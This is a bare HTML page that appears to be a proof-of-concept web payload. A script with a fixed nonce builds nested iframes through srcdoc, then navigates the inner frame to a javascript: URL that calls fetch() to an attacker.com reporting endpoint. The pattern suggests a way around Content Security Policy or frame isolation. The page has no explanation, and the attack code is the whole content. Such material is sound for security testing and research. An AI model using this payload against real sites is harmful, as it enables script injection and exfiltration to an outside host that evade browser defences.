<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGwPwUHGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGwPwUHGGGGG.addEventListener("load",()=>{GGGGGwPwUHGGGGG.srcdoc="<iframe id=GGGGwPwUHGGGG src=about:blank><\/iframe><script nonce=123>GGGGwPwUHGGGG.addEventListener('load',()=>{GGGGwPwUHGGGG.contentWindow.location.href='javascript:fetch(`https://attacker.com/report/report`)';},{once:true});<\/script>";},{once:true});
};
</script>
</body>
</html>